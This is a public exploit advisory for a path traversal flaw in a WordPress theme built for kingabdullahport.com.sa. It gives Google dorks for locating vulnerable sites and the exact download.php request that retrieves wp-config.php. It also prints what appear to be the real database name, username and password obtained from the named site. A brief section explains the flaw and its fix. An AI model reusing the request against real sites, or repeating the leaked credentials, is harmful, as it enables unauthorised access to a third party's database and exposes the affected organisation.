############################################################################################
# Exploit Title : WordPress 4.9.8 KingAbdullahPort KAP Themes Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepages : kingabdullahport.com.sa - phoekus.com
# Software Information Link :
phoekus.com/webdesignandevelopmentwordpress
linkedin.com/company/phoekus
zoominfo.com/c/phoekus/371582770
# Software Affected Version : 4.9.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : inurl:/wp-content/themes/kap/
intext:Site by Phoekus
# Vulnerability Type :
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
############################################################################################
# Impact :
***********
* WordPress 4.9.8 KingAbdullahPort KAP Themes is prone to a vulnerability that lets attackers download the database configuration file because
the application fails to sufficiently sanitize user-supplied input. The affected input is the url parameter of the theme's download.php.
An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive information.
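* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
to have access to that information.
* The software has a Relative Path Traversal vulnerability: it uses external input to construct
a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
to a location that is outside of that directory.
* The fix is for download.php to resolve the requested path and reject anything that falls outside the intended download directory.
Database credentials in a wp-config.php that was reachable this way should be treated as disclosed and rotated.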
############################################################################################
# Vulnerable File :
****************
/download.php
# Vulnerable Parameter :
**********************
?url=
# Database Configuration File Download Exploit :
********************************************
/wp-content/themes/kap/download.php?url=../../../wp-config.php
Information about the MySQL database configuration file =>
****************************************************
/** The name of the database for WordPress */
define('DB_NAME', '');
/** MySQL database username */
define('DB_USER', '');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', '');
############################################################################################
# Example Vulnerable Sites :
*************************
[+] kingabdullahport.com.sa/wp-content/themes/kap/download.php?url=../../../wp-config.php
** //
/** The name of the database for WordPress */
define('DB_NAME', 'kingapor_kap');
/** MySQL database username */
define('DB_USER', 'kingapor_kapusr');
/** MySQL database password */
define('DB_PASSWORD', '@teGo0Z*zZBk');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
*
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################